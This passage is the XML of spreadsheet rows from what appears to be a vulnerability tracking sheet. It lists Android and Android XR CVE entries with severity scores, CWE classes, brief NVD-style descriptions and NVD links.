      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr"/>
      <c r="Q757" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R757"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S757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28653</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr"/>
      <c r="Q758" s="5" t="inlineStr">
        <is>
          <t>CWE-1190, CWE-787</t>
        </is>
      </c>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28655</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr"/>
      <c r="Q759" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R759"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S759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28657</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr"/>
      <c r="Q760" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R760"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S760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28658</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr"/>
      <c r="Q761" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28659</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>google:android_xr</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr"/>
      <c r="Q762" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28663</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr"/>
      <c r="Q763" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R763"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S763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28664</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr"/>
      <c r="Q764" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28668</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr"/>
      <c r="Q765" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45515</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr"/>
      <c r="Q766" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R766"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S766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45520</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr"/>
      <c r="Q767" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R767"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S767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45531</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr"/>
      <c r="Q768" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49881</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr"/>
      <c r="Q769" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R769"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S769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49884</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr"/>
      <c r="Q770" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R770"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S770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49887</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr"/>
      <c r="Q771" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R771"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S771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49918</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr"/>
      <c r="Q772" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49919</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr"/>
      <c r="Q773" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R773"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S773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49927</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr"/>
      <c r="Q774" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49932</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr"/>
      <c r="Q775" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55273</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr"/>
